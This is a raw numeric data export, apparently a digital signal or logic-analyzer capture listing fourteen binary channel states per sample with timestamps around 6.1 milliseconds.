0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0692280e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0692520e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0692560e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0693000e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0693240e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0693320e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0693480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0693760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0694000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0694280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0694520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0694760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0695000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0695240e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0695320e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0695760e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0696000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0696080e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0696280e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0696520e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0696560e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0697000e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0697240e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0697320e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0697520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0697760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0698000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0698280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0698520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0698760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0699240e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0699480e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0699560e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0700040e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0700280e-03 0,1,1,1,1,1,0,0,0,0,0,0,0,0,6.0700320e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0700360e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0700520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0700760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0701240e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0701480e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0701760e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0702000e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0702280e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0702520e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0702760e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0703000e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0703240e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0703480e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0703560e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0704040e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0704280e-03 0,1,1,1,1,1,0,0,0,0,0,0,0,0,6.0704320e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0704360e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0704520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0704760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0705000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0705240e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0705320e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0705760e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0706000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0706080e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0706280e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0706520e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0706760e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0707000e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0707240e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0707480e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0707760e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0708000e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0708280e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0708520e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0708560e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0709000e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0709240e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0709320e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0709760e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0710040e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0710280e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0710520e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0710760e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0711000e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0711240e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0711480e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0711560e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0712040e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0712280e-03 0,1,1,1,1,1,0,0,0,0,0,0,0,0,6.0712320e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0712360e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0712520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0712760e-03 0,1,1,1,1,0,0,0,0,1,0,0,0,0,6.0712800e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0712840e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0713000e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0713240e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0713480e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0713760e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0714000e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0714280e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0714520e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0714760e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0715240e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0715520e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0715760e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0716000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0716080e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0716280e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0716520e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0716760e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0717000e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0717080e-03 0,1,1,1,1,1,0,0,0,1,0,0,1,0,6.0717520e-03 0,1,1,1,1,1,0,0,0,1,0,0,0,0,6.0717760e-03 0,1,1,1,1,1,0,0,0,0,0,0,0,0,6.0717800e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0717840e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0718040e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0718280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0718520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0718760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0719000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0719240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0719480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0719760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0720000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0720280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0720520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0720760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0721000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0721240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0721480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0721760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0722000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0722280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0722520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0722760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0723000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0723240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0723480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0723760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0724000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0724280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0724520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0724760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0725000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0725240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0725480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0725760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0726000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0726280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0726520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0726760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0727000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0727240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0727480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0727760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0728000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0728280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0728520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0728760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0729000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0729240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0729480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0729760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0730000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0730280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0730520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0730760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0731000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0731240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0731480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0731760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0732000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0732280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0732520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0732760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0733000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0733240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0733480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0733760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0734000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0734280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0734520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0734760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0735000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0735240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0735480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0735760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0736000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0736280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0736520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0736760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0737000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0737240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0737480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0737760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0738000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0738280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0738520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0738760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0739000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0739240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0739480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0739760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0740000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0740280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0740520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0740760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0741000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0741240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0741480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0741760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0742000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0742280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0742520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0742760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0743000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0743240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0743480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0743760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0744000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0744280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0744520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0744760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0745000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0745240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0745480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0745760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0746000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0746280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0746520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0746760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0747000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0747240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0747480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0747760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0748000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0748280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0748520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0748760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0749000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0749240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0749480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0749760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0750000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0750280e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0750520e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0750760e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0751000e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0751240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0751480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0751720e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0751960e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0752240e-03 0,1,1,1,1,0,0,0,0,0,0,0,1,0,6.0752480e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,0,6.0752760e-03 0,1,1,1,1,0,0,0,0,0,0,0,0,1,6.1997560e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,1,6.1999360e-03 1,1,1,1,1,0,0,0,0,0,0,1,0,1,6.1999720e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,1,6.1999920e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2005880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2010440e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2010680e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2010760e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2010920e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2011160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2011240e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2011720e-03 1,1,1,1,1,0,0,0,0,1,0,0,0,0,6.2011960e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2012000e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2012200e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2012440e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2012520e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2012920e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2013160e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2013240e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2013440e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2013680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2013760e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2013960e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2014200e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2014240e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2014440e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2014680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2014760e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2015200e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2015440e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2015960e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2016200e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2016680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2016920e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2017000e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2017160e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2017440e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2017960e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2018200e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2018280e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2018440e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2018680e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2018760e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2019200e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2019440e-03 1,1,1,1,1,1,0,0,0,0,0,0,0,0,6.2019480e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2019520e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2019720e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2019960e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2020200e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2020440e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2020680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2020920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2021160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2021440e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2021480e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2021960e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2022200e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2022280e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2022440e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2022680e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2022760e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2022920e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2023160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2023240e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2023720e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2023960e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2024440e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2024680e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2025200e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2025440e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2025480e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2025680e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2025960e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2026440e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2026680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2026760e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2026920e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2027160e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2027240e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2027440e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2027680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2027760e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2028200e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2028440e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2028920e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2029160e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2029720e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2029960e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2030440e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2030680e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2030760e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2030920e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2031160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2031240e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2031440e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2031680e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2031960e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2032200e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2032240e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2032680e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2032920e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2033000e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2033200e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2033440e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2033680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2033960e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2034200e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2034440e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2034680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2034920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2035160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2035440e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2035480e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2035960e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2036200e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2036440e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2036680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2036760e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2037200e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2037440e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2037920e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2038160e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2038680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2038920e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2038960e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2039160e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2039400e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2039480e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2039640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2039880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2040160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2040400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2040680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2040920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2041160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2041400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2041640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2041880e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2041960e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2042440e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2042680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2042760e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2042920e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2043160e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2043400e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2043640e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2043920e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2044160e-03 